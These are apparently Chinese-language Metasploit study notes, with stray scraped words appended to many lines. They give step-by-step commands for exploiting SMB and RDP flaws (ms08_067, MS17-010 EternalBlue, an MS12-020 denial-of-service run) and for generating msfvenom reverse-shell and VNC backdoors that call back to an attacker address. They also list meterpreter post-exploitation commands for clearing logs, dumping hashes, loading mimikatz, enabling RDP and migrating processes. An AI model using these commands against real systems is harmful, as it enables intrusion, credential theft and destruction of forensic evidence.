show exploitphp
show payloadlinux
msf使用數據庫加快搜索,否則每次都等半天git
service postgresql start
msfdb reinit
msf > db_rebuild_cache
須要等待幾分鐘github
查詢漏洞對應的模塊sql
use exploit/windows/smb/ms08_067_netapishell
info 查看漏洞信息數據庫
show option 查看配置選項windows
set target 34 設置目標系統api
set payload windows/meterpreter/reverse_tcp 設置攻擊載荷 session
set lhost 192.168.137.128
set lport 444
攻擊失敗掃描目標主機是否存在漏洞、
利用nmap和數據庫掃描主機
back 回到上一級目錄
db_nmap 掃描系統,而且存儲在postgrep數據庫中
services 查看數據庫掃描結果
vulns 查看漏洞主機
攻擊失敗緣由是由於漏洞不存在,所以先掃描是否存在漏洞,再進行攻擊
搜索2017漏洞
search選項
Keywords:
app : Modules that are client or server attacks
author : Modules written by this author
bid : Modules with a matching Bugtraq ID
cve : Modules with a matching CVE ID
edb : Modules with a matching Exploit-DB ID
name : Modules with a matching descriptive name
platform : Modules affecting this platform
ref : Modules with a matching ref
type : Modules of a specific type (exploit, auxiliary, or post)
使用 ftp匿名登陸掃描模塊
auxiliary/scanner/ftp/anonymous
掃描發現metasploitable 是有ftp匿名登陸的
使用ms17-010 永恆之藍漏洞
首先使用分析模塊發現主機是否存在漏洞
use auxiliary/scanner/smb/smb_ms17_010
Require 中 yes爲必須設置的選項
show missing 查看必須設置的選項
windows系統 遠程桌面拒絕服務漏洞
查看漏洞ms12-020對應得模塊
使用第二個模塊
use auxiliary/scanner/rdp/ms12_020_check
show missing
set rhost 192.168.137.130
掃描是否存在3389拒絕服務攻擊(無視防火牆),掃描結果以下
使用第一個模塊模塊進行攻擊
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST 192.168.137.130
run
攻擊結果
使用payload模塊
使用正向模塊,攻擊者主動去鏈接目標機
use windows/meterpreter/bind_tcp
RHOST 不是必須的,由於只要到達payload到達對方,就會開啓4444端口,可使用generate 生產後門
-t 指定後綴
-f 指定輸出文件名
而後把 a.exe 發給目標主機運行,這邊msf run 監聽就能夠鏈接shell了
反向shell ,推薦使用這種,由於防火牆大部分都是限制了端口的
use windows/meterpreter/reverse_tcp
使用msfvenom 生成php後門
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.137.128 lport=444 -f raw -o a.php
後門利用
正向鏈接
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.137.1
run
反向鏈接
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.137.128
set LPORT 444
run
msfvenom 和 msfconsole裏的 generate 是同樣的,不過參數有變化
圖形界面的後門
1 生成後門
msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.137.128 lport=444 -f exe -o vnc.exe
use exploit/multi/handler
set payload windows/vncinject/reverse_tcp
set lport 444
run
2.監聽反彈shell
而後將vnc.exe發給目標主機,目標主機一旦運行,就能夠獲取圖形界面了。這個界面只能看不能操做
若是想操做,再原來的模塊,options中設置
set viewOnly FALSE
這個功能要在圖形界面運行
meterpterShell
一個很強大的shell
運行在內存,避免硬盤讀取操做被取證
傳輸加密
強大的擴展性能夠裝載 mimikatz等
[meterpreter命令] 可使用linux的命令來管理windows系統
help 查看系統
background 轉到後臺進程運行,如有同時幾個session鏈接,該命令頗有用
clearev 清除目標的日誌
execute 執行目標系統的程序
getprivs 查看當前系統權限
kill 同linux
reg 修改註冊表
suspen 暫停進程
getuid 查看登陸的用戶
getsystem 提權到system用戶
hashdump 獲取hash值
screenshot 截屏
shell 進入DOS
idletime 查看空閒時間,若是時間比較長,表示目標主機暫時沒有人操做
sysinfo 系統信息
getsid 當前服務用戶ID
getpid 當前服務的進程號
ps linux格式查看進程
upload 上傳文件
upload /usr/share/windows-binaries/nc.exe C:\\Users\\Administrator\\Desktop 上傳nc文件,注意路徑斜槓
download 下載文件
download 123.txt 默認當前路徑是在桌面
getwd 獲取遠程主機當前目錄
getlwd 查看當前攻擊者主機的目錄
run vnc 開啓桌面監控
load espia 加載截屏模塊
screengrab
load mimikatz 加載mimikatz模塊
開啓遠程桌面
run post/windows/manage/enable_rdp
linux下連3389遠程桌面
rdesktop 192.168.137.1
關閉遠程桌面
經過執行meterpreter Script腳本
/root/.msf4/loot/20180118112336_default_192.168.137.1_host.windows.cle_168896.txt 該文件名是經過在執行開啓3389時會顯示出來的
轉移進程:若是後門進程被kill了,那麼咱們的meterpreter也會被kill掉
使用migrate轉移進程,首先提權
getsystem
migrate -N explorer.exe 轉移到桌面進程
在hanlder模塊裏
show advanced 查看高級選項
set autorunscript migrate -N explorer.exe 一旦session 鏈接成功自動運行腳本 轉移進程號
兩個感嘆號中,官方建議不要使用meterpreter的 migrate 而是單獨使用模塊 post/windows/manage/migrate 來執行
導入漏洞利用代碼,永恆之藍
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
要確保WINEPATH ETERNALBLUEPATH DOUBLEPULSARPATH 三個目錄的路徑是正確的
.wine須要首次運行一個windows程序纔會生成
成功拿到xp的shell
kali更新源因祕鑰沒法apt-get update錯誤
https://blog.csdn.net/boy668866/article/details/79631608
查看當前時間是否正確